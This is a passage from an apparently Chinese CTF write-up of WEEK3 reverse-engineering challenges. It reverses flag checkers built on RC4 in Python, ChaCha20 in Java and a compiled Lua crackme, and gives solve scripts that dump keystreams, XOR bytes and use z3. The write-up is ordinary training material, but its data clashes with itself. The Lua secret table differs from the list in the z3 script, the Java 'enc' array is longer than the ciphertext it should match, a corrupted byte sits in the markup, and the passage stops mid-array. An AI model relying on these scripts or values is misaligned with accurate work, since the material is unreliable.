class="line">36</span><br><span class="line">37</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-comment"># uncompyle6 version 3.9.0</span><br><span class="hljs-comment"># Python bytecode version base 3.8.0 (3413)</span><br><span class="hljs-comment"># Decompiled from: Python 2.7.18 (v2.7.18:8d21aa21f2, Apr 20 2020, 13:25:05) [MSC v.1500 64 bit (AMD64)]</span><br><span class="hljs-comment"># Embedded file name: fun.py</span><br><br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">rc4_encrypt</span>(<span class="hljs-params">key, plaintext</span>):<br>    S = <span class="hljs-built_in">list</span>(<span class="hljs-built_in">range</span>(<span class="hljs-number">256</span>))<br>    j = <span class="hljs-number">0</span><br>    <span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-number">256</span>):<br>        j = (j + S[i] + key[i % <span class="hljs-built_in">len</span>(key)]) % <span class="hljs-number">256</span><br>        S[i], S[j] = S[j], S[i]<br>    <span class="hljs-keyword">else</span>:<br>        i = j = <span class="hljs-number">0</span><br>        ciphertext = <span class="hljs-built_in">bytearray</span>()<br>        <span class="hljs-keyword">for</span> char <span class="hljs-keyword">in</span> plaintext:<br>            i = (i + <span class="hljs-number">1</span>) % <span class="hljs-number">256</span><br>            j = (j + S[i]) % <span class="hljs-number">256</span><br>            S[i], S[j] = S[j], S[i]<br>            k = S[(S[i] + S[j]) % <span class="hljs-number">256</span>]<br>            ciphertext.append(char ^ k)<br>        <span class="hljs-keyword">else</span>:<br>            <span class="hljs-built_in">print</span>(ciphertext) <span class="hljs-comment"># added for the writeup: RC4 is symmetric, so calling rc4_encrypt(key, check) prints the flag</span><br>            <span class="hljs-keyword">return</span> ciphertext<br><br><br>key = <span class="hljs-string">b'example_key'</span><br>check = <span 
class="hljs-string">b'\xd8\x94\x1e\xab\x9bft\xeb]@\x1b\xba\xe6\xe8\x133W\xdd\x0e\xe6\x924\xf1\x80mh\xeb=\x08a\x02\t.\xb5\x05B\xb0\xb0/D\x8cY'</span><br><span class="hljs-built_in">print</span>(<span class="hljs-string">'Plz input your flag:'</span>)<br>flag = <span class="hljs-built_in">input</span>().encode(<span class="hljs-string">'utf-8'</span>)<br>encrypted = rc4_encrypt(key, flag)<br><span class="hljs-keyword">if</span> encrypted == check:<br>    <span class="hljs-built_in">print</span>(<span class="hljs-string">'yes'</span>)<br><span class="hljs-keyword">else</span>:<br>    <span class="hljs-built_in">print</span>(<span class="hljs-string">'no'</span>)<br><span class="hljs-comment"># okay decompiling C:\Users\a\Desktop\new.pyc</span><br><br></code></pre></td></tr></table></figure><p>This is plain RC4 with the hard-coded key <code>example_key</code>. RC4 is a symmetric stream cipher (the same keystream is XORed in both directions), so running <code>rc4_encrypt(key, check)</code> with that key returns the flag without any further work.</p><h3 id="WEEK3-java是最棒的语言吗"><a href="#WEEK3-java是最棒的语言吗" class="headerlink" title="[WEEK3]java是最棒的语言吗"></a>[WEEK3]java是最棒的语言吗 (is Java the best language?)</h3><p>Copy the decompiled Java into a fresh project and add two print statements: one inside <code>encrypt()</code> to dump the ChaCha20 keystream bytes as they are generated (what the writeup calls the key) and one inside <code>hexStringToBytes()</code> to dump the expected ciphertext. XORing the two byte sequences gives the flag.</p><figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span 
class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span 
class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br></pre></td><td class="code"><pre><code class="hljs java"><span class="hljs-keyword">import</span> java.nio.charset.StandardCharsets;<br><span class="hljs-keyword">import</span> java.util.Arrays;<br><span class="hljs-keyword">import</span> java.util.Scanner;<br><br><span class="hljs-comment">/* renamed from: ChaCha20 reason: default package */</span><br><span class="hljs-comment">/* loaded from: java是最棒的语言吗.class */</span><br><span class="hljs-keyword">public</span> <span class="hljs-keyword">class</span> <span class="hljs-title class_">ChaCha20</span> {<br> <span class="hljs-keyword">public</span> <span class="hljs-keyword">static</span> <span class="hljs-keyword">void</span> <span class="hljs-title function_">main</span><span class="hljs-params">(String[] strArr)</span> {<br> <span class="hljs-type">Scanner</span> <span class="hljs-variable">scanner</span> <span class="hljs-operator">=</span> <span class="hljs-keyword">new</span> <span class="hljs-title class_">Scanner</span>(System.in);<br> System.out.println(<span class="hljs-string">"input 
your flag:"</span>);<br> <span class="hljs-type">String</span> <span class="hljs-variable">nextLine</span> <span class="hljs-operator">=</span> scanner.nextLine();<br> <span class="hljs-keyword">if</span> (Arrays.equals(encrypt(nextLine.getBytes(StandardCharsets.UTF_8), <span class="hljs-string">"Shctf_Welcomes_Have_4_good_t1me_"</span>.getBytes(), <span class="hljs-string">"HsehrcOedfgs"</span>.getBytes()), hexStringToBytes(<span class="hljs-string">"ce43283af73d106815fe5293b474f5309d44063c7fde19533300c60603dfe528d19aee2f6db615191e45"</span>))) {<br> System.out.println(<span class="hljs-string">"right!"</span>);<br> } <span class="hljs-keyword">else</span> {<br> System.out.println(<span class="hljs-string">"error!"</span>);<br> }<br> }<br><br> <span class="hljs-keyword">private</span> <span class="hljs-keyword">static</span> <span class="hljs-type">byte</span>[] encrypt(<span class="hljs-type">byte</span>[] bArr, <span class="hljs-type">byte</span>[] bArr2, <span class="hljs-type">byte</span>[] bArr3) {<br> <span class="hljs-type">int</span>[] chachaInit = chachaInit(bArr2, bArr3);<br> <span class="hljs-type">byte</span>[] bArr4 = <span class="hljs-keyword">new</span> <span class="hljs-title class_">byte</span>[bArr.length];<br> <span class="hljs-type">byte</span>[] bArr5 = <span class="hljs-keyword">new</span> <span class="hljs-title class_">byte</span>[<span class="hljs-number">64</span>];<br> <span class="hljs-keyword">for</span> (<span class="hljs-type">int</span> <span class="hljs-variable">i</span> <span class="hljs-operator">=</span> <span class="hljs-number">0</span>; i < bArr.length; i += <span class="hljs-number">64</span>) {<br> chachaBlock(chachaInit, bArr5);<br> <span class="hljs-keyword">for</span> (<span class="hljs-type">int</span> <span class="hljs-variable">i2</span> <span class="hljs-operator">=</span> <span class="hljs-number">0</span>; i2 < <span class="hljs-number">64</span> && i + i2 < bArr.length; i2++) {<br> bArr4[i + i2] = (<span 
class="hljs-type">byte</span>) (bArr[i + i2] ^ bArr5[i2]);<br> System.out.print(bArr5[i2] + <span class="hljs-string">","</span>); <span class="hljs-comment">// added for the writeup: dump the keystream byte that was XORed in</span><br> }<br> System.out.println(<span class="hljs-string">"\n"</span>);<br> chachaInit[<span class="hljs-number">12</span>] = chachaInit[<span class="hljs-number">12</span>] + <span class="hljs-number">1</span>;<br> }<br> <span class="hljs-keyword">return</span> bArr4;<br> }<br><br> <span class="hljs-keyword">private</span> <span class="hljs-keyword">static</span> <span class="hljs-type">int</span>[] chachaInit(<span class="hljs-type">byte</span>[] bArr, <span class="hljs-type">byte</span>[] bArr2) {<br> <span class="hljs-type">int</span>[] iArr = <span class="hlj�s-keyword">new</span> <span class="hljs-title class_">int</span>[<span class="hljs-number">16</span>];<br> iArr[<span class="hljs-number">0</span>] = <span class="hljs-number">1634760805</span>;<br> iArr[<span class="hljs-number">1</span>] = <span class="hljs-number">857760878</span>;<br> iArr[<span class="hljs-number">2</span>] = <span class="hljs-number">2036477234</span>;<br> iArr[<span class="hljs-number">3</span>] = <span class="hljs-number">1797285236</span>;<br> <span class="hljs-keyword">for</span> (<span class="hljs-type">int</span> <span class="hljs-variable">i</span> <span class="hljs-operator">=</span> <span class="hljs-number">0</span>; i < <span class="hljs-number">8</span>; i++) {<br> iArr[<span class="hljs-number">4</span> + i] = bytesToIntLittleEndian(bArr, i * <span class="hljs-number">4</span>);<br> }<br> iArr[<span class="hljs-number">12</span>] = <span class="hljs-number">0</span>;<br> iArr[<span class="hljs-number">13</span>] = <span class="hljs-number">0</span>;<br> iArr[<span class="hljs-number">14</span>] = bytesToIntLittleEndian(bArr2, <span class="hljs-number">0</span>);<br> iArr[<span class="hljs-number">15</span>] = bytesToIntLittleEndian(bArr2, <span class="hljs-number">4</span>);<br> <span class="hljs-keyword">return</span> iArr;<br> 
}<br><br> <span class="hljs-keyword">private</span> <span class="hljs-keyword">static</span> <span class="hljs-keyword">void</span> <span class="hljs-title function_">chachaBlock</span><span class="hljs-params">(<span class="hljs-type">int</span>[] iArr, <span class="hljs-type">byte</span>[] bArr)</span> {<br> <span class="hljs-type">int</span>[] copyOf = Arrays.copyOf(iArr, <span class="hljs-number">16</span>);<br> <span class="hljs-keyword">for</span> (<span class="hljs-type">int</span> <span class="hljs-variable">i</span> <span class="hljs-operator">=</span> <span class="hljs-number">0</span>; i < <span class="hljs-number">10</span>; i++) {<br> chachaDoubleRound(copyOf);<br> }<br> <span class="hljs-keyword">for</span> (<span class="hljs-type">int</span> <span class="hljs-variable">i2</span> <span class="hljs-operator">=</span> <span class="hljs-number">0</span>; i2 < <span class="hljs-number">16</span>; i2++) {<br> intToBytesLittleEndian(iArr[i2] + copyOf[i2], bArr, i2 * <span class="hljs-number">4</span>);<br> }<br> }<br><br> <span class="hljs-keyword">private</span> <span class="hljs-keyword">static</span> <span class="hljs-keyword">void</span> <span class="hljs-title function_">chachaDoubleRound</span><span class="hljs-params">(<span class="hljs-type">int</span>[] iArr)</span> {<br> quarterRound(iArr, <span class="hljs-number">0</span>, <span class="hljs-number">4</span>, <span class="hljs-number">8</span>, <span class="hljs-number">12</span>);<br> quarterRound(iArr, <span class="hljs-number">1</span>, <span class="hljs-number">5</span>, <span class="hljs-number">9</span>, <span class="hljs-number">13</span>);<br> quarterRound(iArr, <span class="hljs-number">2</span>, <span class="hljs-number">6</span>, <span class="hljs-number">10</span>, <span class="hljs-number">14</span>);<br> quarterRound(iArr, <span class="hljs-number">3</span>, <span class="hljs-number">7</span>, <span class="hljs-number">11</span>, <span class="hljs-number">15</span>);<br> 
quarterRound(iArr, <span class="hljs-number">0</span>, <span class="hljs-number">5</span>, <span class="hljs-number">10</span>, <span class="hljs-number">15</span>);<br> quarterRound(iArr, <span class="hljs-number">1</span>, <span class="hljs-number">6</span>, <span class="hljs-number">11</span>, <span class="hljs-number">12</span>);<br> quarterRound(iArr, <span class="hljs-number">2</span>, <span class="hljs-number">7</span>, <span class="hljs-number">8</span>, <span class="hljs-number">13</span>);<br> quarterRound(iArr, <span class="hljs-number">3</span>, <span class="hljs-number">4</span>, <span class="hljs-number">9</span>, <span class="hljs-number">14</span>);<br> }<br><br> <span class="hljs-keyword">private</span> <span class="hljs-keyword">static</span> <span class="hljs-keyword">void</span> <span class="hljs-title function_">quarterRound</span><span class="hljs-params">(<span class="hljs-type">int</span>[] iArr, <span class="hljs-type">int</span> i, <span class="hljs-type">int</span> i2, <span class="hljs-type">int</span> i3, <span class="hljs-type">int</span> i4)</span> {<br> iArr[i] = iArr[i] + iArr[i2];<br> iArr[i4] = rotateLeft(iArr[i4] ^ iArr[i], <span class="hljs-number">16</span>);<br> iArr[i3] = iArr[i3] + iArr[i4];<br> iArr[i2] = rotateLeft(iArr[i2] ^ iArr[i3], <span class="hljs-number">12</span>);<br> iArr[i] = iArr[i] + iArr[i2];<br> iArr[i4] = rotateLeft(iArr[i4] ^ iArr[i], <span class="hljs-number">8</span>);<br> iArr[i3] = iArr[i3] + iArr[i4];<br> iArr[i2] = rotateLeft(iArr[i2] ^ iArr[i3], <span class="hljs-number">7</span>);<br> }<br><br> <span class="hljs-keyword">private</span> <span class="hljs-keyword">static</span> <span class="hljs-type">int</span> <span class="hljs-title function_">rotateLeft</span><span class="hljs-params">(<span class="hljs-type">int</span> i, <span class="hljs-type">int</span> i2)</span> {<br> <span class="hljs-keyword">return</span> (i << i2) | (i >>> (<span class="hljs-number">32</span> - i2));<br> }<br><br> <span 
class="hljs-keyword">private</span> <span class="hljs-keyword">static</span> <span class="hljs-type">int</span> <span class="hljs-title function_">bytesToIntLittleEndian</span><span class="hljs-params">(<span class="hljs-type">byte</span>[] bArr, <span class="hljs-type">int</span> i)</span> {<br> <span class="hljs-keyword">return</span> ((bArr[i + <span class="hljs-number">3</span>] & <span class="hljs-number">255</span>) << <span class="hljs-number">24</span>) | ((bArr[i + <span class="hljs-number">2</span>] & <span class="hljs-number">255</span>) << <span class="hljs-number">16</span>) | ((bArr[i + <span class="hljs-number">1</span>] & <span class="hljs-number">255</span>) << <span class="hljs-number">8</span>) | (bArr[i] & <span class="hljs-number">255</span>);<br> }<br><br> <span class="hljs-keyword">private</span> <span class="hljs-keyword">static</span> <span class="hljs-keyword">void</span> <span class="hljs-title function_">intToBytesLittleEndian</span><span class="hljs-params">(<span class="hljs-type">int</span> i, <span class="hljs-type">byte</span>[] bArr, <span class="hljs-type">int</span> i2)</span> {<br> bArr[i2] = (<span class="hljs-type">byte</span>) (i & <span class="hljs-number">255</span>);<br> bArr[i2 + <span class="hljs-number">1</span>] = (<span class="hljs-type">byte</span>) ((i >>> <span class="hljs-number">8</span>) & <span class="hljs-number">255</span>);<br> bArr[i2 + <span class="hljs-number">2</span>] = (<span class="hljs-type">byte</span>) ((i >>> <span class="hljs-number">16</span>) & <span class="hljs-number">255</span>);<br> bArr[i2 + <span class="hljs-number">3</span>] = (<span class="hljs-type">byte</span>) ((i >>> <span class="hljs-number">24</span>) & <span class="hljs-number">255</span>);<br> }<br><br> <span class="hljs-keyword">private</span> <span class="hljs-keyword">static</span> <span class="hljs-type">byte</span>[] hexStringToBytes(String str) {<br> <span class="hljs-type">int</span> <span 
class="hljs-variable">length</span> <span class="hljs-operator">=</span> str.length();<br> <span class="hljs-type">byte</span>[] bArr = <span class="hljs-keyword">new</span> <span class="hljs-title class_">byte</span>[length / <span class="hljs-number">2</span>];<br> <span class="hljs-keyword">for</span> (<span class="hljs-type">int</span> <span class="hljs-variable">i</span> <span class="hljs-operator">=</span> <span class="hljs-number">0</span>; i < length; i += <span class="hljs-number">2</span>) {<br> bArr[i / <span class="hljs-number">2</span>] = (<span class="hljs-type">byte</span>) ((Character.digit(str.charAt(i), <span class="hljs-number">16</span>) << <span class="hljs-number">4</span>) + Character.digit(str.charAt(i + <span class="hljs-number">1</span>), <span class="hljs-number">16</span>));<br> System.out.print(bArr[i / <span class="hljs-number">2</span>] + <span class="hljs-string">","</span>); <span class="hljs-comment">// added here: dump each decoded (signed) byte so it can be copied into the solve script</span><br> }<br> <span class="hljs-keyword">return</span> bArr;<br> }<br><br> <span class="hljs-keyword">private</span> <span class="hljs-keyword">static</span> String <span class="hljs-title function_">bytesToHexString</span><span class="hljs-params">(<span class="hljs-type">byte</span>[] bArr)</span> {<br> <span class="hljs-type">StringBuilder</span> <span class="hljs-variable">sb</span> <span class="hljs-operator">=</span> <span class="hljs-keyword">new</span> <span class="hljs-title class_">StringBuilder</span>();<br> <span class="hljs-type">int</span> <span class="hljs-variable">length</span> <span class="hljs-operator">=</span> bArr.length;<br> <span class="hljs-keyword">for</span> (<span class="hljs-type">int</span> <span class="hljs-variable">i</span> <span class="hljs-operator">=</span> <span class="hljs-number">0</span>; i < length; i++) {<br> sb.append(String.format(<span class="hljs-string">"%02x"</span>, Byte.valueOf(bArr[i])));<br> }<br> <span class="hljs-keyword">return</span> sb.toString();<br> 
}<br>}<br></code></pre></td></tr></table></figure><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><code class="hljs python">key = [-<span class="hljs-number">50</span>, <span class="hljs-number">67</span>, <span class="hljs-number">40</span>, <span class="hljs-number">58</span>, -<span class="hljs-number">9</span>, <span class="hljs-number">61</span>, <span class="hljs-number">16</span>, <span class="hljs-number">104</span>, <span class="hljs-number">21</span>, -<span class="hljs-number">2</span>, <span class="hljs-number">82</span>, -<span class="hljs-number">109</span>, -<span class="hljs-number">76</span>, <span class="hljs-number">116</span>, -<span class="hljs-number">11</span>, <span class="hljs-number">48</span>, -<span class="hljs-number">99</span>, <span class="hljs-number">68</span>, <span class="hljs-number">6</span>, <span class="hljs-number">60</span>, <span class="hljs-number">127</span>, -<span class="hljs-number">34</span>, <span class="hljs-number">25</span>, <span class="hljs-number">83</span>, <span class="hljs-number">51</span>, <span class="hljs-number">0</span>,<br> -<span class="hljs-number">58</span>, <span class="hljs-number">6</span>, <span class="hljs-number">3</span>, -<span class="hljs-number">33</span>, -<span class="hljs-number">27</span>, <span class="hljs-number">40</span>, -<span class="hljs-number">47</span>, -<span class="hljs-number">102</span>, -<span class="hljs-number">18</span>, <span class="hljs-number">47</span>, <span class="hljs-number">109</span>, -<span class="hljs-number">74</span>, <span class="hljs-number">21</span>, <span class="hljs-number">25</span>, <span 
class="hljs-number">30</span>, <span class="hljs-number">69</span>, ]<br>enc = [-<span class="hljs-number">88</span>,<span class="hljs-number">47</span>,<span class="hljs-number">73</span>,<span class="hljs-number">93</span>,-<span class="hljs-number">116</span>,<span class="hljs-number">11</span>,<span class="hljs-number">35</span>,<span class="hljs-number">81</span>,<span class="hljs-number">32</span>,-<span class="hljs-number">53</span>,<span class="hljs-number">107</span>,-<span class="hljs-number">95</span>,-<span class="hljs-number">125</span>,<span class="hljs-number">89</span>,-<span class="hljs-number">64</span>,<span class="hljs-number">81</span>,-<span class="hljs-number">81</span>,<span class="hljs-number">115</span>,<span class="hljs-number">43</span>,<span class="hljs-number">8</span>,<span class="hljs-number">74</span>,-<span class="hljs-number">22</span>,<span class="hljs-number">122</span>,<span class="hljs-number">126</span>,<span class="hljs-number">80</span>,<span class="hljs-number">100</span>,-<span class="hljs-number">91</span>,<span class="hljs-number">49</span>,<span class="hljs-number">46</span>,-<span class="hljs-number">24</span>,-<span class="hljs-number">121</span>,<span class="hljs-number">31</span>,-<span class="hljs-number">78</span>,-<span class="hljs-number">7</span>,-<span class="hljs-number">41</span>,<span class="hljs-number">31</span>,<span class="hljs-number">95</span>,-<span class="hljs-number">122</span>,<span class="hljs-number">115</span>,<span class="hljs-number">45</span>,<span class="hljs-number">40</span>,<span class="hljs-number">56</span>,<span class="hljs-number">81</span>,<span class="hljs-number">26</span>,-<span class="hljs-number">10</span>,-<span class="hljs-number">25</span>,<span class="hljs-number">105</span>,-<span class="hljs-number">36</span>,-<span class="hljs-number">21</span>,<span class="hljs-number">59</span>,<span class="hljs-number">122</span>,-<span class="hljs-number">97</span>,-<span 
class="hljs-number">89</span>,-<span class="hljs-number">102</span>,<span class="hljs-number">81</span>,-<span class="hljs-number">116</span>,<span class="hljs-number">52</span>,-<span class="hljs-number">61</span>,-<span class="hljs-number">106</span>,<span class="hljs-number">85</span>,-<span class="hljs-number">81</span>,-<span class="hljs-number">54</span>,-<span class="hljs-number">123</span>,<span class="hljs-number">119</span>,<br>-<span class="hljs-number">32</span>,<span class="hljs-number">32</span>,<span class="hljs-number">105</span>,-<span class="hljs-number">37</span>,-<span class="hljs-number">117</span>,<span class="hljs-number">6</span>,-<span class="hljs-number">128</span>,<span class="hljs-number">89</span>,<span class="hljs-number">2</span>,-<span class="hljs-number">4</span>,-<span class="hljs-number">21</span>,-<span class="hljs-number">118</span>,-<span class="hljs-number">94</span>,-<span class="hljs-number">81</span>,<span class="hljs-number">103</span>,<span class="hljs-number">26</span>,<span class="hljs-number">21</span>]<br><span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-built_in">len</span>(key)):<br> <span class="hljs-comment"># key[]/enc[] are Java signed bytes; a mixed-sign pair XORs to a</span><br> <span class="hljs-comment"># negative int, so mask to 0..255 instead of negating it</span><br> tmp = (key[i] ^ enc[i]) & <span class="hljs-number">0xff</span><br> <span class="hljs-built_in">print</span>(<span class="hljs-built_in">chr</span>(tmp), end=<span class="hljs-string">''</span>)<br><span class="hljs-built_in">print</span>()<br></code></pre></td></tr></table></figure><h3 id="WEEK3-crackme"><a href="#WEEK3-crackme" class="headerlink" title="[WEEK3]crackme"></a>[WEEK3]crackme</h3><p><a href="https://www.luatool.cn/index.php">Lua Toolbox (luatool.cn)</a></p><p>The PE scanner identifies the file as compiled Lua, so we decompile it with the online tool and get the check routine back:</p><figure class="highlight lua"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br></pre></td><td class="code"><pre><code class="hljs lua"><span class="hljs-built_in">print</span>(<span class="hljs-string">"please input your flag:"</span>)<br>flag = <span class="hljs-built_in">io</span>.<span class="hljs-built_in">read</span>()<br>code = {}<br>secret = {<br> <span class="hljs-number">54</span>, <span class="hljs-number">57</span>, <span class="hljs-number">566</span>, <span class="hljs-number">532</span>, <span class="hljs-number">1014</span>, <span class="hljs-number">1</span>, <span class="hljs-number">7</span>, <span class="hljs-number">508</span>, <span class="hljs-number">10</span>, <span class="hljs-number">12</span>, <span class="hljs-number">498</span>, <span class="hljs-number">494</span>, <span class="hljs-number">6</span>, <span class="hljs-number">24</span>, <span class="hljs-number">14</span>, <span class="hljs-number">20</span>, <span class="hljs-number">489</span>, <span class="hljs-number">492</span>, <span 
class="hljs-number">0</span>, <span class="hljs-number">10</span>, <span class="hljs-number">490</span>, <span class="hljs-number">498</span>, <span class="hljs-number">517</span>, <span class="hljs-number">539</span>, <span class="hljs-number">21</span>, <span class="hljs-number">528</span>, <span class="hljs-number">517</span>, <span class="hljs-number">530</span>, <span class="hljs-number">543</span>, <span class="hljs-number">9</span>, <span class="hljs-number">13</span>, <span class="hljs-number">0</span>, <span class="hljs-number">4</span>, <span class="hljs-number">51</span>, <span class="hljs-number">562</span>, <span class="hljs-number">518</span>, <span class="hljs-number">9</span>, <span class="hljs-number">0</span>, <span class="hljs-number">516</span>, <span class="hljs-number">6</span>, <span class="hljs-number">2</span>, <span class="hljs-number">572</span>, <span class="hljs-number">2</span>, <span class="hljs-number">515</span>, <span class="hljs-number">60</span>, <span class="hljs-number">63</span>, <span class="hljs-number">62</span>, <span class="hljs-number">570</span>, <span class="hljs-number">553</span>, <span class="hljs-number">31</span>, <span class="hljs-number">1</span>, <span class="hljs-number">594</span>, <span class="hljs-number">117</span>, <span class="hljs-number">15</span><br>}<br>l = <span class="hljs-built_in">string</span>.<span class="hljs-built_in">len</span>(flag)<br><span class="hljs-keyword">for</span> i = <span class="hljs-number">1</span>, l <span class="hljs-keyword">do</span><br> num = ((<span class="hljs-built_in">string</span>.<span class="hljs-built_in">byte</span>(flag, i) + i) % <span class="hljs-number">333</span> + <span class="hljs-number">444</span>) % <span class="hljs-number">555</span> - <span class="hljs-number">1</span><br> <span class="hljs-built_in">table</span>.<span class="hljs-built_in">insert</span>(code, num)<br><span class="hljs-keyword">end</span><br><span class="hljs-keyword">for</span> i = 
<span class="hljs-number">1</span>, l <span class="hljs-keyword">do</span><br> x = i - <span class="hljs-number">1</span><br> <span class="hljs-keyword">if</span> i + <span class="hljs-number">2</span> >= l <span class="hljs-keyword">then</span><br> code[i] = code[i % l + <span class="hljs-number">1</span>] ~ code[(i + <span class="hljs-number">1</span>) % l + <span class="hljs-number">1</span>]<br> <span class="hljs-keyword">else</span><br> code[i] = code[(i + <span class="hljs-number">1</span>) % l] ~ code[(i + <span class="hljs-number">2</span>) % l]<br> <span class="hljs-keyword">end</span><br><span class="hljs-keyword">end</span><br><span class="hljs-keyword">for</span> i = <span class="hljs-number">1</span>, l <span class="hljs-keyword">do</span><br> <span class="hljs-keyword">if</span> secret[i] ~= code[i] <span class="hljs-keyword">then</span><br> <span class="hljs-built_in">print</span>(<span class="hljs-string">"Incorrect"</span>)<br> <span class="hljs-keyword">return</span><br> <span class="hljs-keyword">end</span><br><span class="hljs-keyword">end</span><br><span class="hljs-built_in">print</span>(<span class="hljs-string">"You win,flag is"</span>, flag)<br><br></code></pre></td></tr></table></figure><p>Each input byte is first mapped through ((byte + i) % 333 + 444) % 555 - 1, and only then does the in-place XOR chain mix each entry with the next two (wrapping around at the end, where it already sees the rewritten entries). z3 handles the bit-vector XOR chain well but the modular map is awkward to encode, so let z3 recover the per-position values before the XOR step, then invert the modular map per position by brute force over printable bytes:</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span 
class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-comment"># z3 can't solve problems like x%100==1(these mod value equation)</span><br><span class="hljs-keyword">from</span> z3 <span class="hljs-keyword">import</span> *<br><br>s = Solver() <br>secret = [<span class="hljs-number">54</span>, <span class="hljs-number">57</span>, <span class="hljs-number">566</span>, <span class="hljs-number">532</span>, <span class="hljs-number">1014</span>, <span class="hljs-number">1</span>, <span class="hljs-number">7</span>, <span class="hljs-number">508</span>, <span class="hljs-number">10</span>, <span class="hljs-number">12</span>, <span class="hljs-number">498</span>, <span class="hljs-number">494</span>, <span class="hljs-number">6</span>, <span class="hljs-number">24</span>, <span class="hljs-number">14</span>, <span class="hljs-number">20</span>, <span class="hljs-number">489</span>, <span class="hljs-number">492</span>, <span class="hljs-number">0</span>, <span class="hljs-number">10</span>, <span class="hljs-number">490</span>, <span class="hljs-number">498</span>, <span class="hljs-number">517</span>, <span class="hljs-number">539</span>, <span class="hljs-number">21</span>,<br> <span class="hljs-number">528</span>, <span class="hljs-number">517</span>, <span class="hljs-number">530</span>, <span class="hljs-number">543</span>, <span class="hljs-number">9</span>, <span class="hljs-number">13</span>, <span class="hljs-number">0</span>, <span class="hljs-number">4</span>, <span class="hljs-number">51</span>, <span class="hljs-number">562</span>, <span class="hljs-number">518</span>, <span class="hljs-number">14</span>, <span class="hljs-number">527</span>, <span class="hljs-number">520</span>, <span class="hljs-number">0</span>, 
